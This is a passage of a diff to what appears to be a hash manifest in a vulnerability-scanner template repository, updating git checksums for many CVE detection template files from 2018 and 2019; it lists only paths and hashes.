-http/cves/2018/CVE-2018-16283.yaml:1407461db6a872dc160725bba66edc6af1277c49 +http/cves/2018/CVE-2018-16059.yaml:f0f383141243b44b902a5f48e20d5a16219c85db +http/cves/2018/CVE-2018-16133.yaml:d3a2b5ead8fbbf59c36b22ee318516fcda99ff46 +http/cves/2018/CVE-2018-16139.yaml:1ba1f1fd650d9fef55b9d4a87f2fad17ca8c64b5 +http/cves/2018/CVE-2018-16159.yaml:2a21291319d331a71b9f21753072c69dab26d0bc +http/cves/2018/CVE-2018-16167.yaml:389c449659f652301adb70da945bd7c4854d51cb +http/cves/2018/CVE-2018-16283.yaml:6f759b12dbc0cf59cbf012014c624e2f0f7b571b http/cves/2018/CVE-2018-16288.yaml:44e7abcb5356243e054bf3b0827d7606cb7cedfd -http/cves/2018/CVE-2018-16299.yaml:2d3b6311af966d287894c69cd59864da574dbdcb +http/cves/2018/CVE-2018-16299.yaml:50cef1c73da4a017e8e4cf6c435ca5c045333294 http/cves/2018/CVE-2018-16341.yaml:0e46eee24d582952eee8b66879b5817147e220ce -http/cves/2018/CVE-2018-16668.yaml:d01ba4a7847cdc124b409bd28ca8e7a4671260a1 -http/cves/2018/CVE-2018-16670.yaml:2417af6df439e1c26a6fea230a827b9f98820377 -http/cves/2018/CVE-2018-16671.yaml:74adc4cca9c5b78103555e60ba3a9ccfd0fb2236 -http/cves/2018/CVE-2018-16716.yaml:5cb54eaac7d8d419b21e5dde10d01698f0ed5277 -http/cves/2018/CVE-2018-16761.yaml:ee72036b432b3b7d96ca800fb6df7ac664da1561 -http/cves/2018/CVE-2018-16763.yaml:155d70ad3ac037b054481cf73c64c1c0c5208a52 -http/cves/2018/CVE-2018-16836.yaml:9f2d19f0e3eb8fe5c9454aa11f474193338ddab8 -http/cves/2018/CVE-2018-16979.yaml:a71033bcdfbd1c39d4da17bad2440e34c371421a -http/cves/2018/CVE-2018-17153.yaml:ad2ccbb8097bbab09f4aee3ad797382a025dd196 -http/cves/2018/CVE-2018-17246.yaml:c182a6fdd3ef8f7b5254eb28791bac5b22a46c1f -http/cves/2018/CVE-2018-17254.yaml:0b29d088f378f49bcf79176acbb5e904aeb32c1a -http/cves/2018/CVE-2018-17422.yaml:c6d248f7e966716c82a04aa5d330be3132631a9c -http/cves/2018/CVE-2018-17431.yaml:96a057b8b6bf891aaebd73773d79b8bf983d2ad3 -http/cves/2018/CVE-2018-18069.yaml:7a050f004baefe6a663aa7d886c487de52a056c4 -http/cves/2018/CVE-2018-18264.yaml:3c4cd3e24deb4d270352335cb6ee17c660a38e29 -http/cves/2018/CVE-2018-18323.yaml:b08a70fb8117e9ee547b6354932f5b8e5226956d -http/cves/2018/CVE-2018-18570.yaml:fb7261cf88d6982dd2e7ba1fe531a410af5d47aa -http/cves/2018/CVE-2018-18608.yaml:138cd5d6a37882d36025be31d756cf7d161b66ad -http/cves/2018/CVE-2018-18775.yaml:ad9f51375238c224a6511ab89f2a678c7d47a56b -http/cves/2018/CVE-2018-18777.yaml:4e74f8fe39e9fd024604ce4a46a574576766a37e +http/cves/2018/CVE-2018-16668.yaml:85e178e3535729b375c1f014bc18136d7f6cfb61 +http/cves/2018/CVE-2018-16670.yaml:9c8bc834a2123dae944f11add691c7dc4478508f +http/cves/2018/CVE-2018-16671.yaml:4a32880f13da1cc4a1a4540de78ba3415db9b784 +http/cves/2018/CVE-2018-16716.yaml:cb4398217b4261b0c057666c5b0cd8936259d8de +http/cves/2018/CVE-2018-16761.yaml:41be7ab926fdd239bdf7bcd3fa3ea0821860a7b5 +http/cves/2018/CVE-2018-16763.yaml:5f545971590f102e23b628ffd30db3664abbafdc +http/cves/2018/CVE-2018-16836.yaml:447083cf4771c1937c167b93c3368c2b428669fb +http/cves/2018/CVE-2018-16979.yaml:6eeb616b914840081f82f65b31179d11e648b92c +http/cves/2018/CVE-2018-17153.yaml:051a8f4dcf39bd460e47af409d783269ea2359ae +http/cves/2018/CVE-2018-17246.yaml:3891aed2b2c2e0103bebc3201a39241c01a4ad8d +http/cves/2018/CVE-2018-17254.yaml:0624b5c5677912254367eccc381a8d5e55b38a4d +http/cves/2018/CVE-2018-17422.yaml:9b2ad74a20dd6abc66bb9d65cdf2386e93071a90 +http/cves/2018/CVE-2018-17431.yaml:b9ef3a6711200cf6c903935a8f2f13f3ab4cacd5 +http/cves/2018/CVE-2018-18069.yaml:2636ff9c97f8f25c39ca78aff8c57cfbdca1fd57 +http/cves/2018/CVE-2018-18264.yaml:f510bd42390b381825be71f3fc32d5f59ea52df7 +http/cves/2018/CVE-2018-18323.yaml:87fa05215bf5e4f96cf8a5f4fd74a81b25963fea +http/cves/2018/CVE-2018-18570.yaml:2844a6d99e320f1b74463e3b8e170e47a2b58670 +http/cves/2018/CVE-2018-18608.yaml:a3b5ec311269de74767db061f783c1795fb56b76 +http/cves/2018/CVE-2018-18775.yaml:bf9e2ad83b5a3a2f66b8672c24d158493e597f15 +http/cves/2018/CVE-2018-18777.yaml:0154599d4b22c5077272a098674fde2e2b92733a http/cves/2018/CVE-2018-18778.yaml:54b0d2955ddbb108efd6b7bb47bfd058a6a74d50 -http/cves/2018/CVE-2018-18809.yaml:9e88d991471bd2c37be9ffc35e6ddd1925740c58 -http/cves/2018/CVE-2018-18925.yaml:51aa872f17a1f944a113c961cc25b300f7702461 -http/cves/2018/CVE-2018-19136.yaml:6aaa2d4494b6b2b4ddf4b126f23c67a2e18d1112 -http/cves/2018/CVE-2018-19137.yaml:04156df1ba8adea1db91ed3dca6ebea1565a5a3f -http/cves/2018/CVE-2018-19287.yaml:016c6bfa065dd204bf813c36b8a69bae696598f0 -http/cves/2018/CVE-2018-19326.yaml:4c85cfb7906c0151b88d420d15443326d4f4e8c0 -http/cves/2018/CVE-2018-19365.yaml:00a2b277583e60192fb698922c0835e3fd092771 -http/cves/2018/CVE-2018-19386.yaml:d773c8e77ee59f8b9adb600e0c7178bbb07c1e6b -http/cves/2018/CVE-2018-19439.yaml:268bc30f481f7362cc202c6f551822e912db1b5e -http/cves/2018/CVE-2018-19458.yaml:b2b235c9df27693ec346f10ba1fb7fad6964dba5 -http/cves/2018/CVE-2018-19749.yaml:5d466f996cee7cbf4c73a893955f12f5db93d011 -http/cves/2018/CVE-2018-19751.yaml:7cd0238cd423b47880196057f1c7f5bfb9f4f7de -http/cves/2018/CVE-2018-19752.yaml:458cfe85477b57b5bf776819c58ab045350cda01 -http/cves/2018/CVE-2018-19753.yaml:8b0e00061ac7f14966869de0af9a1481d3aad8cc -http/cves/2018/CVE-2018-19877.yaml:98f29485a2891eb79522e1487cc807b05c6774a0 -http/cves/2018/CVE-2018-19892.yaml:1d9eb9cc3d00198637309040ce8dbb3ef6a9037a -http/cves/2018/CVE-2018-19914.yaml:c7c22b62cef1b35dc711dfcd4cd89cbddf322202 -http/cves/2018/CVE-2018-19915.yaml:803ddb99ccb0bf3cd823ab4682dbd902b7e5d4dd -http/cves/2018/CVE-2018-20009.yaml:ae2c46e3b7682d46c14e04869f033623421945ec -http/cves/2018/CVE-2018-20010.yaml:735d78826eaf28ed3bbd987ef9607b24c926ec62 -http/cves/2018/CVE-2018-20011.yaml:662ba689121543617896cd4dd7bd7443cc831ecf -http/cves/2018/CVE-2018-20462.yaml:29bbc1ea74135080ef4f39556351cf1661f5481d -http/cves/2018/CVE-2018-20463.yaml:2e9cbffa85d960a60bbdb7d0bf55fc84552cab21 -http/cves/2018/CVE-2018-20470.yaml:c097907cc55bce1bd6f7b7792dc493be9acc526e -http/cves/2018/CVE-2018-20526.yaml:d0424da172f066eb3c9ae7ca0698a2e66647bc38 -http/cves/2018/CVE-2018-20608.yaml:4b00980b6ffedaa0d4195d509b3922a97973c5b9 -http/cves/2018/CVE-2018-20824.yaml:3f47aec22ef22dc7462ddabfc606e08537c183b0 -http/cves/2018/CVE-2018-20985.yaml:1522ac05886d2a1f86235b56fabc7265df081c04 -http/cves/2018/CVE-2018-2392.yaml:4eb956d895e6c7e87af161d7ed910b02dcda92f2 -http/cves/2018/CVE-2018-2791.yaml:27064ffc86559017a3d738dec32067804fc992ec +http/cves/2018/CVE-2018-18809.yaml:c1a8c473fd0d5075137ba062845e101e8be7a4b6 +http/cves/2018/CVE-2018-18925.yaml:daa8dcc02bff5a67ec965872df9925d6da5f7f84 +http/cves/2018/CVE-2018-19136.yaml:0649716e3b24da08c7c7c3102a612dd41ad0657e +http/cves/2018/CVE-2018-19137.yaml:56592a356f8d566be02db9febb14d3c82376c5d9 +http/cves/2018/CVE-2018-19287.yaml:54187abd54dbbc669465f9dac60f296d5306b6c7 +http/cves/2018/CVE-2018-19326.yaml:6d27dc82252052d7f2535bef1f75bc60491e61ef +http/cves/2018/CVE-2018-19365.yaml:d94593fa74be7df4b46563543522a3710b1c4065 +http/cves/2018/CVE-2018-19386.yaml:d9c0bc7ab31d4ecc82d6a200bb8627473ed660fd +http/cves/2018/CVE-2018-19439.yaml:250617d2eeb5cf47785111008f28e3762e813306 +http/cves/2018/CVE-2018-19458.yaml:16e3007597af88f5f82c7203d41274a3e24f3ab3 +http/cves/2018/CVE-2018-19749.yaml:5885723c507719ca172497a96b5bbd9008d8bc61 +http/cves/2018/CVE-2018-19751.yaml:35db0bf8caf6ecbbdc6420971d294723cd8f082d +http/cves/2018/CVE-2018-19752.yaml:70bfee41ae21da21c51c4fee5b3a718b61dc4f7e +http/cves/2018/CVE-2018-19753.yaml:6736e012e3bec0190db782405404808d52ec460c +http/cves/2018/CVE-2018-19877.yaml:3a10175f1f4af084eedadfe1c875fafbb6cd3030 +http/cves/2018/CVE-2018-19892.yaml:54b04f333b0e93cdc40e915d64e1e99938134305 +http/cves/2018/CVE-2018-19914.yaml:1489d3b9b605be8ac119c1c9222091b1f126a90f +http/cves/2018/CVE-2018-19915.yaml:135f99b1cb229052af5d1f2733a19109806108e8 +http/cves/2018/CVE-2018-20009.yaml:b2b29e584ba6ffeb834f0120ceef5982fe8451a7 +http/cves/2018/CVE-2018-20010.yaml:df4aad9386b1d60d34346ed60e6edef5ebb162e5 +http/cves/2018/CVE-2018-20011.yaml:38ce289f6dc33c8f8e6fc967913e0bac5cb212c2 +http/cves/2018/CVE-2018-20462.yaml:fa2d16514e10fe34ac333f507465d375f698845c +http/cves/2018/CVE-2018-20463.yaml:7e389ca1e49e3772f4faeb430ee11fc6c7f15451 +http/cves/2018/CVE-2018-20470.yaml:5c07587c5aeb424f1c26a216779def61df3ab018 +http/cves/2018/CVE-2018-20526.yaml:b417eb5ac3fcfed3af36c3fd1121d46543e4737c +http/cves/2018/CVE-2018-20608.yaml:f9a90f9c1827d48ca1cae33cc0d23afd112ce21c +http/cves/2018/CVE-2018-20824.yaml:0f8f846ac025ce8ab57b1a16175bd6a0287a4152 +http/cves/2018/CVE-2018-20985.yaml:d78c3f472bd47024cf7f888666134dd8b8720fe8 +http/cves/2018/CVE-2018-2392.yaml:6ee4b540332b66ade0895d41d2ebaf0289683a00 +http/cves/2018/CVE-2018-2791.yaml:9f82e04670fcb186ae619845e94f0bfe11e63037 http/cves/2018/CVE-2018-2894.yaml:5d7e618d70f45221a913bcc9e348fbd2daad5f34 -http/cves/2018/CVE-2018-3167.yaml:90bb1ea33e60e8c6287344f540bc3fc56f98a92f -http/cves/2018/CVE-2018-3238.yaml:b4c169051487dabc796298c6f8809bbd5cfb95de -http/cves/2018/CVE-2018-3714.yaml:6a38c250b4437c90ff0c3f6c6487ac1b5ff339d7 -http/cves/2018/CVE-2018-3760.yaml:2bb254ae132d84f7c95010ac70e4411cc568bdf1 -http/cves/2018/CVE-2018-3810.yaml:0c50e867b75ece8186dd8dae971cea25b350e7c1 -http/cves/2018/CVE-2018-5230.yaml:ab6d083b21087d9d6855c13d1a9b11643105f680 -http/cves/2018/CVE-2018-5233.yaml:bbc55fa29e6b6b793aa649e1fd175f67767962ab -http/cves/2018/CVE-2018-5316.yaml:c339e9d7b3daba10a912204218d870aa7b3655e8 -http/cves/2018/CVE-2018-5715.yaml:87612c8bef84ed42318db35e9351c8f94da5663b -http/cves/2018/CVE-2018-6008.yaml:47c72d3ba3bb82fd191141101f799794e3c74497 -http/cves/2018/CVE-2018-6184.yaml:3766046764cc6450c72573ca3a6fac8b2f489120 -http/cves/2018/CVE-2018-6200.yaml:ad5767c5a37095c84d94b1f4ebe277c3bb7c4153 -http/cves/2018/CVE-2018-6530.yaml:5cde3c13ef97a98af95e52970ce59f2c4e21b9c3 -http/cves/2018/CVE-2018-6910.yaml:64bed8ef4004ee2d309d7de10549d707ddc4a500 -http/cves/2018/CVE-2018-7251.yaml:1c9004eedc18688edf8ebd3ef5014e33182b4123 -http/cves/2018/CVE-2018-7282.yaml:1120d4286aa81909800e45d8fa9d9976af4cfdd8 -http/cves/2018/CVE-2018-7422.yaml:53fe85ac9ca0d7e6513dd0c23a15ad36d91fae7a -http/cves/2018/CVE-2018-7467.yaml:2fbe0c51dc3498f6408a107b8b124db65f889257 +http/cves/2018/CVE-2018-3167.yaml:9cc0b2d66409d87d84f7cfb3a3259c5f8c2b3330 +http/cves/2018/CVE-2018-3238.yaml:de7921d2c6b68caf7ad3066842d499ed7da5698b +http/cves/2018/CVE-2018-3714.yaml:3dbfbda00ebe80c90ead44e7d0c13e1bd266a032 +http/cves/2018/CVE-2018-3760.yaml:f734bd4574905b9c66b1c1f50ebd339ff87acc16 +http/cves/2018/CVE-2018-3810.yaml:78c0c56a1c94822dab8f36260ec998050cc5f557 +http/cves/2018/CVE-2018-5230.yaml:992a40360345f862fddd6169bdec91681d82c345 +http/cves/2018/CVE-2018-5233.yaml:4ac29bd4c587a27fd1de441ef788bf358b2b0e80 +http/cves/2018/CVE-2018-5316.yaml:123ef12461925d190371c2ac2058f08605c6943e +http/cves/2018/CVE-2018-5715.yaml:01d4c09b4d3ce7f825ac5d5234ccc0e73b233a43 +http/cves/2018/CVE-2018-6008.yaml:7505c7594c6a86e32a3fead1d9597aa5c01321df +http/cves/2018/CVE-2018-6184.yaml:d3d44669417f86669b5d0857456079832468f1b1 +http/cves/2018/CVE-2018-6200.yaml:38804f3145ca50d2fbb79808cd2a399aeca6bfe3 +http/cves/2018/CVE-2018-6530.yaml:d024505544a73fb55ce854169cc7b926265da0d0 +http/cves/2018/CVE-2018-6910.yaml:b4a56a889838ef14be9062a190fc6ad9149156ce +http/cves/2018/CVE-2018-7251.yaml:0d6918b06cb363650487e7136dba7d099ec1bf56 +http/cves/2018/CVE-2018-7282.yaml:25d2ab25ec9c426285e1f859aa455aa77d6d32e3 +http/cves/2018/CVE-2018-7422.yaml:b2ef55ac6f59c4956e3914f57857f491772b6553 +http/cves/2018/CVE-2018-7467.yaml:615723849e2bfc06c5d3f62eab3c52cf5d41b22d http/cves/2018/CVE-2018-7490.yaml:31792531ad634a82d37e3156427d4786d8f5f95c http/cves/2018/CVE-2018-7600.yaml:2f0fd02f9ab28043580327a3eddd64df76b81639 -http/cves/2018/CVE-2018-7602.yaml:f5a7e49ebd8210cbc8fd5f84d25822af63ca2b2b -http/cves/2018/CVE-2018-7653.yaml:93e1132b2d6005ba72885cdf86d724829ae864aa -http/cves/2018/CVE-2018-7662.yaml:eb964c393c8c7c52d6efd60d970c0a48cec5d8b5 -http/cves/2018/CVE-2018-7700.yaml:07fe45a663ea0dfbd36ce80384595b62a40dad84 -http/cves/2018/CVE-2018-7719.yaml:e9cf1c70acc5ad9003b7233263703a54c81e23dc +http/cves/2018/CVE-2018-7602.yaml:e769b1d5902c9c4a238efa3a38347e8e29f0beb8 +http/cves/2018/CVE-2018-7653.yaml:d8ce9c36619df3489bc02ab9a27681e75f437dc3 +http/cves/2018/CVE-2018-7662.yaml:3bfb3917bf2f39f25b0865d7ddd75b6c39cd9605 +http/cves/2018/CVE-2018-7700.yaml:569cabf60a16551ec7fa5043e3fe4c2f3e80480b +http/cves/2018/CVE-2018-7719.yaml:042f247129364758ded509a7b1a28160630e7f40 http/cves/2018/CVE-2018-8006.yaml:9eeb94b0ca21a837a60b1a3ea6db1bd0d29c2035 -http/cves/2018/CVE-2018-8033.yaml:75ca312c226dc303c03239f32a3878c42eedf164 -http/cves/2018/CVE-2018-8715.yaml:a71a64a9140f015416e5656770e226c18dcbb3a9 -http/cves/2018/CVE-2018-8719.yaml:1548d3297a8359e0599b5dd42da3d24b6cd1527c -http/cves/2018/CVE-2018-8727.yaml:4ca1bc2056ad437c328e55bcea5029f016cedc15 -http/cves/2018/CVE-2018-8770.yaml:7bc6419cc0cebe0cb94af72e9b918f16953ccc06 -http/cves/2018/CVE-2018-9118.yaml:de8b5a22432665d272eca8c9c6c4fd48142deabd -http/cves/2018/CVE-2018-9161.yaml:898e508256ad836b8ed9554ce21a486b50565462 -http/cves/2018/CVE-2018-9205.yaml:8b775ed18713b169a171f4a0a739a4cd9426e4d2 -http/cves/2018/CVE-2018-9845.yaml:4a9dc9438ee5911578e6159c314177493d16942a -http/cves/2018/CVE-2018-9995.yaml:a2344d84d754257f85e4c16539b9441a6591b656 -http/cves/2019/CVE-2019-0193.yaml:8a60eeba47c9e20c67f38ed4ff067d30f6e0f2cf -http/cves/2019/CVE-2019-0221.yaml:f910d00bbc1ad2d73b61965a7c033df6fd295595 +http/cves/2018/CVE-2018-8033.yaml:49850b37d1e5d9a53a56ee442b4a83827283fa0f +http/cves/2018/CVE-2018-8715.yaml:7b1f9be47d695b33612632d7fade735ce2d330e9 +http/cves/2018/CVE-2018-8719.yaml:82675dc620d961d57f42ad3c0f9756b8befc6cf8 +http/cves/2018/CVE-2018-8727.yaml:ea4295cd5e178dac45c2cf9ad94a213171c17eab +http/cves/2018/CVE-2018-8770.yaml:3693ba9f55451e3cfe61dde5a5dbf10491968446 +http/cves/2018/CVE-2018-9118.yaml:ab204f5522f000333295daf1c8b90edafc182525 +http/cves/2018/CVE-2018-9161.yaml:84c2db194835486ec0b56f9033152d2fe3f095aa +http/cves/2018/CVE-2018-9205.yaml:5628ba3e3737fbe1d09a29242e323ba1e93ca2ed +http/cves/2018/CVE-2018-9845.yaml:2ba785e9cb89261bb4410e4c13c4c4ccac17077d +http/cves/2018/CVE-2018-9995.yaml:7550422fc44a955cdfb0c0ebed1e0c39c232b9f2 +http/cves/2019/CVE-2019-0193.yaml:d4ef0350320a567f547c8114c7ac943a1743a4f7 +http/cves/2019/CVE-2019-0221.yaml:70f4779f3233697fafee903ea2c5150c7d67f76d http/cves/2019/CVE-2019-0230.yaml:b1d5b77c4a866bda8c3cb830dd2e4878ca7e0864 -http/cves/2019/CVE-2019-10068.yaml:075622522e6fb63084a3103f9e2a5a012db5b289 -http/cves/2019/CVE-2019-10092.yaml:a028670a8e6bb2f6d7b5fcb3eefd11c0f9a8ec3e -http/cves/2019/CVE-2019-10098.yaml:365e8309fab70cf2e364d1f193dc59168a784d48 -http/cves/2019/CVE-2019-1010287.yaml:bbc04433de9a060b7b7c650b7f563c6e5c2a687c -http/cves/2019/CVE-2019-1010290.yaml:d51c77461012c1e0869e7e9db34986074536b7a4 -http/cves/2019/CVE-2019-10232.yaml:04bc7d8b6c504b8b619ad3b3c7d04cd7481f6869 -http/cves/2019/CVE-2019-10405.yaml:b3ba0d32202c8670c37f6ca37d7a16164188e58c +http/cves/2019/CVE-2019-10068.yaml:b534a4f0e8a3d7746f20fc33123b3df8b4cf5fe8 +http/cves/2019/CVE-2019-10092.yaml:b7013f35f40ba6898ac4bd7f0cfcc76985555b1b +http/cves/2019/CVE-2019-10098.yaml:7999ca884c8e675365bc7a5a35ed80824917b787 +http/cves/2019/CVE-2019-1010287.yaml:9e020b4cb1e2eed3f12b6bc6ceda6ab2f91b770a +http/cves/2019/CVE-2019-1010290.yaml:48e5bab907a413eaa7b9f4ea011459ade103928a +http/cves/2019/CVE-2019-10232.yaml:00b6f3fac359bc9d2c6b1a8604ea480f0bb17713 +http/cves/2019/CVE-2019-10405.yaml:be68c39b90d63af418a5e91f72034ce3f51e580f http/cves/2019/CVE-2019-10475.yaml:5b1ddd04978edb96b449907fd9ccab93d32b1e55 http/cves/2019/CVE-2019-10692.yaml:900d28c8148d85a16ab562a5cfa69bc760dfaed9 -http/cves/2019/CVE-2019-10717.yaml:a9f7b45c84dd554ecf0ee742801cd1d25c571aaf -http/cves/2019/CVE-2019-10758.yaml:2417a73c68ac8652f0189c6906307dc491dc67b8 -http/cves/2019/CVE-2019-11013.yaml:ca87cb1cc6518410549b4b724613d85af27795ba -http/cves/2019/CVE-2019-11248.yaml:46e7e62354487de22d8bb5476b741a9f05ed6c1b -http/cves/2019/CVE-2019-11370.yaml:54c5fb214e6edd29a8fe2f8f23ba4446765e708c +http/cves/2019/CVE-2019-10717.yaml:fb1b8cc3c0bbcb6b6c689ad5229a3a858e476609 +http/cves/2019/CVE-2019-10758.yaml:a9bff59e22bb70f6f15332b023e075f8b12a5247 +http/cves/2019/CVE-2019-11013.yaml:1d88fd6bae1bd37cc99af2cf76e98b83c379d232 +http/cves/2019/CVE-2019-11248.yaml:5b735cecc415a76ee35b335a1e70c3bd8aea32d6 +http/cves/2019/CVE-2019-11370.yaml:44d56ed8fc81f705dfefc46fbb4fc563f59ef46f http/cves/2019/CVE-2019-11510.yaml:2ce7148f765bc7b8687cb114d50b35f5535d6e83 -http/cves/2019/CVE-2019-11580.yaml:cdfaadbda0b62a145cf4f0e89a66f91749030391 -http/cves/2019/CVE-2019-11581.yaml:25eae69b309567a103290ef71a67ddeee6093d1e -http/cves/2019/CVE-2019-11869.yaml:c663d2a53ae827e98ff17bcff12dc53eed9cc933 +http/cves/2019/CVE-2019-11580.yaml:4e368cd016362644782235b7fab274e8aaffbf2f +http/cves/2019/CVE-2019-11581.yaml:9e7b83c9d58e9b4e0ffd4cff4a24934328e5339a +http/cves/2019/CVE-2019-11869.yaml:9d68761dff622e3cbda242fdad4fbb88d9949104 http/cves/2019/CVE-2019-12276.yaml:b16079992208eee3bb8cd16c6971bbc935151295 -http/cves/2019/CVE-2019-12314.yaml:145305986d342e7807191ebd57d83069330f853f -http/cves/2019/CVE-2019-12461.yaml:15fdda8674bdd86a03ddaa362581ad1029f5b86d -http/cves/2019/CVE-2019-12581.yaml:36e7f640f2cb6852ed21c2c4975dc6d1558b09d9 -http/cves/2019/CVE-2019-12583.yaml:ede0cbfa5ff5bdc80bfc3d5671de9a7fecbee102 +http/cves/2019/CVE-2019-12314.yaml:2bbf9c931d5aaf66fab372cd4110b6e8b2a5b40d +http/cves/2019/CVE-2019-12461.yaml:d1d414912fa627ee2686f9ab56df4f1dc56de648 +http/cves/2019/CVE-2019-12581.yaml:585ba5b37647db7055a77d560128d850d8146885 +http/cves/2019/CVE-2019-12583.yaml:4c74df0063f82a03832da0cb348d092eec680925 http/cves/2019/CVE-2019-12593.yaml:2ac02535a3f58d1c56c1e2e4ca9b4311367923c6 -http/cves/2019/CVE-2019-12616.yaml:6ffa4fac50773faaa6a8345112d937340bd430e4 +http/cves/2019/CVE-2019-12616.yaml:4d6775c502006aeccf8e87f3a2034bc6155c49fa http/cves/2019/CVE-2019-12725.yaml:9bf59d3a66b3c9d1efbf6521f07bef965727e7c9 -http/cves/2019/CVE-2019-12962.yaml:c68d72186500158e23eb6d0773533152f3d0b8bf +http/cves/2019/CVE-2019-12962.yaml:aeacbbcd9e43aec8b1581c9432961fcc9805124b http/cves/2019/CVE-2019-12985.yaml:f8ccb9f96a7753da176124e29f44884b114f3f83 http/cves/2019/CVE-2019-12986.yaml:bdd2b567c3d1a1f8872f4977f0bdb676dcd2dd83 http/cves/2019/CVE-2019-12987.yaml:34475cae13ddb6ed6d2876a8577427e15c19f8ac http/cves/2019/CVE-2019-12988.yaml:ed150b7eac970eccbcd13a891875fdc27724cb52 -http/cves/2019/CVE-2019-12990.yaml:009f62eca5579b33890bd60e53118c61abd788ca -http/cves/2019/CVE-2019-13101.yaml:0b93eafb1fa5d417cd88092099e2ff7a7fed7366 -http/cves/2019/CVE-2019-13392.yaml:1397567ab719e4a0c5c851160754eb28e7939f04 -http/cves/2019/CVE-2019-13396.yaml:cf708952a0b3551aa6eaaa75de6cfed777371826 -http/cves/2019/CVE-2019-13462.yaml:560cf523fa389087b8fb2ca4b0e3d5d296cb86c6 -http/cves/2019/CVE-2019-14205.yaml:fa5abc933a46a2f0d40aec8717e4b60ee468a7e3 -http/cves/2019/CVE-2019-14223.yaml:c5a956865b87167df3a8848e0ce027d4e9237e9a -http/cves/2019/CVE-2019-14251.yaml:7f19321fd7a779f113ea81f0a8dfa697ab3381d0 -http/cves/2019/CVE-2019-14312.yaml:bcf305821f0854c98be784d1a3fdc32b8afeee68 -http/cves/2019/CVE-2019-14322.yaml:9736792966fac99fe5ba971b19a9cb1023205ff2 -http/cves/2019/CVE-2019-14470.yaml:202ca6ec9ae3d87e6dc87ebfa8c59c1b756ed6c0 -http/cves/2019/CVE-2019-14530.yaml:b2997bfa3cb12020bbdc93defe3a05f39bb7d0e3 -http/cves/2019/CVE-2019-14696.yaml:5cf2b9deca9248c9a259538466e0006d36013828 -http/cves/2019/CVE-2019-14750.yaml:91138a032f8d627b17e5fa6fc833efb7577921d1 -http/cves/2019/CVE-2019-14789.yaml:02ebf58b671044906029ca498deda4573ddd395c -http/cves/2019/CVE-2019-14974.yaml:03f9b45382434c0381df36557c022a486550b2df -http/cves/2019/CVE-2019-15043.yaml:efe69d1ef7d8a3ef0828bc368110c20acac6cc28 -http/cves/2019/CVE-2019-15107.yaml:0caa920566e443f9e3ae10b819124b48bf19c577 -http/cves/2019/CVE-2019-15501.yaml:9eef141d7bf876d5f37e74bd4dd50a71dbf76eec -http/cves/2019/CVE-2019-15642.yaml:2540636d89ad9398f890fb3fe3bf9d80c12c1a00 -http/cves/2019/CVE-2019-15713.yaml:d7b023132ebcbe28e3582f4dffc78b28a147de2b -http/cves/2019/CVE-2019-15811.yaml:1f371540aa345a9d951944845334eaf019717464 -http/cves/2019/CVE-2019-15829.yaml:e828d14a5e2464f478658e7916411ddf0c92938b -http/cves/2019/CVE-2019-15858.yaml:f05ef666a615186e9820b9112a6c009f582ab416 -http/cves/2019/CVE-2019-15859.yaml:14629d467938c04fae6aa7b81787e0a2e5414df4 -http/cves/2019/CVE-2019-15889.yaml:7aaa271f48733cf1233ceac9c33f84dc1873c03e +http/cves/2019/CVE-2019-12990.yaml:13b69c3d25c7fb3c3455d4bd7d024bd9864566be +http/cves/2019/CVE-2019-13101.yaml:801d78a46ae2e3a24b01acf74515cd8bba8447e5 +http/cves/2019/CVE-2019-13392.yaml:16edb1dd922ff50114e5763f4377b82fdb361d16 +http/cves/2019/CVE-2019-13396.yaml:c3ec668c84640e0d36cf2a21bcbf8e40d18b51fe +http/cves/2019/CVE-2019-13462.yaml:a4fcf186613f96e22ed90504c567eda1fdb6b815 +http/cves/2019/CVE-2019-14205.yaml:cfd99c74d6114d5800cb22dfe6b5983ba61cba71 +http/cves/2019/CVE-2019-14223.yaml:e65092cffb0f989cf6f0d33aeb9ee07e4e07cf64 +http/cves/2019/CVE-2019-14251.yaml:af812432be4ec1ae0a8d12c7a4045aec10116e79 +http/cves/2019/CVE-2019-14312.yaml:b55fe10f7d0133804f96b7e7f21627358b192d8e +http/cves/2019/CVE-2019-14322.yaml:12cff02d4b12db1e9e282f961843e99873d284fd +http/cves/2019/CVE-2019-14470.yaml:5c68133fe3088e2b7bbb5dc039379f7daa1dabea +http/cves/2019/CVE-2019-14530.yaml:420d566e9fb61d8ab7068933a743776a35e079ee +http/cves/2019/CVE-2019-14696.yaml:bce320ac51adf47b9d017f19b052161ab9e5a232 +http/cves/2019/CVE-2019-14750.yaml:7162aaf31fb42deecccb0af3c0780b6fefd72d2b +http/cves/2019/CVE-2019-14789.yaml:0596047c94170a8f81b755451223d1d346f11f10 +http/cves/2019/CVE-2019-14974.yaml:e84c3545c2dbd1044110d60826a21f3afea018c3 +http/cves/2019/CVE-2019-15043.yaml:b3a7ae3ed79020e3d54b40b848f16e34867870ee +http/cves/2019/CVE-2019-15107.yaml:95c92d672b46a125608a22be9c69305ec5724bae +http/cves/2019/CVE-2019-15501.yaml:3d5c6e30fb0c79381b61cffa8f237e01f0bf10b5 +http/cves/2019/CVE-2019-15642.yaml:4889e2b33f85585db34d680a17e940594e13c559 +http/cves/2019/CVE-2019-15713.yaml:a258272605464fa13fa0cfece7414e9d0c9ac82d +http/cves/2019/CVE-2019-15811.yaml:a25519c6110cdf0933e6689c65d9572fb232e73f +http/cves/2019/CVE-2019-15829.yaml:62de40dec2bd2e8790cfac45e625d8810d3d1f20 +http/cves/2019/CVE-2019-15858.yaml:1959156c761da962b63eae01185246e844e73cca +http/cves/2019/CVE-2019-15859.yaml:2cb3b9f37c90aeca1e950376adedd2d4f27d3378 +http/cves/2019/CVE-2019-15889.yaml:86ed94ed9874f1554106c5d58f583f95d907292f http/cves/2019/CVE-2019-16057.yaml:d24ec2b3815bbb7e0e702b8be13d5d7773884a6b -http/cves/2019/CVE-2019-16097.yaml:7e31f14f765e77fe2ef7adbd06a0bf033939e5d7 -http/cves/2019/CVE-2019-16123.yaml:1930f7335825bb323198a160cbddd2e974c2e2e9 -http/cves/2019/CVE-2019-16278.yaml:7b493e76fd9866c0f679d23956c0c6d5cefd2559 -http/cves/2019/CVE-2019-16313.yaml:bf5de7bf9470224e7a66f36bbf949cc68ab579bc -http/cves/2019/CVE-2019-16332.yaml:a6c49fe1251322468ec0e59d6563147c6cad9302 -http/cves/2019/CVE-2019-16525.yaml:253bec53a5e01b174179c17728bbb97a977895d7 +http/cves/2019/CVE-2019-16097.yaml:e62d300c3801144a830e59afd1304174daee1d84 +http/cves/2019/CVE-2019-16123.yaml:1285cd2f5d4b49ae096589801356540b9881a519 +http/cves/2019/CVE-2019-16278.yaml:344e0bc75430dad8156bd685afe6fdbf7b89ee37 